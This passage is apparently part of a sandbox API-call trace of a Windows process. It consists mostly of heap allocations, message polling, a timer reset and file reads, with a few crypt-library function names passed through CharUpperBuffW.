(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0095.493] TranslateMessage (lpMsg=0x144f084) returned 0 [0095.493] DispatchMessageW (lpMsg=0x144f084) returned 0x0 [0095.493] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0095.493] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0095.493] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0095.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0095.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0095.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0095.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0095.493] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0095.494] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0095.494] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0095.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0095.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0095.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0c020 [0095.498] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0095.498] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0095.501] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x89f, lpOverlapped=0x0) returned 1 [0095.501] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0095.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0095.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0095.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0095.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1089f) returned 0x4516010 [0095.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0c020 | out: hHeap=0x1780000) returned 1 [0095.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0095.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0095.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0095.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0095.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1089f) returned 0x45268b8 [0095.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0095.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.508] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0095.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0095.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0095.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0095.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0095.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1089f) returned 0x4516010 [0095.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0095.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0095.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0095.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0095.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0095.508] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0095.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0095.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0095.509] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0095.509] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0095.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0095.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1089f) returned 0x4516010 [0095.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0095.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0095.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0095.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0095.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0095.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1089f) returned 0x4537160 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0095.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0095.512] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0095.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0095.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0095.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0095.512] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0095.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0095.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0095.513] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0095.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0095.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0095.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0095.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0095.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0095.514] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0095.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0095.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0095.514] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0095.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0095.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0095.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0095.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0095.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0095.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0095.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0095.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0095.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0095.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0095.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0095.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0095.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0095.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0095.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0095.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0095.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0095.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0095.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0095.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0095.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.515] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0095.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0095.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0095.516] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0095.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0095.516] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0095.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0095.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0095.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0095.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0095.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0095.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0095.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0095.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0095.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0095.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 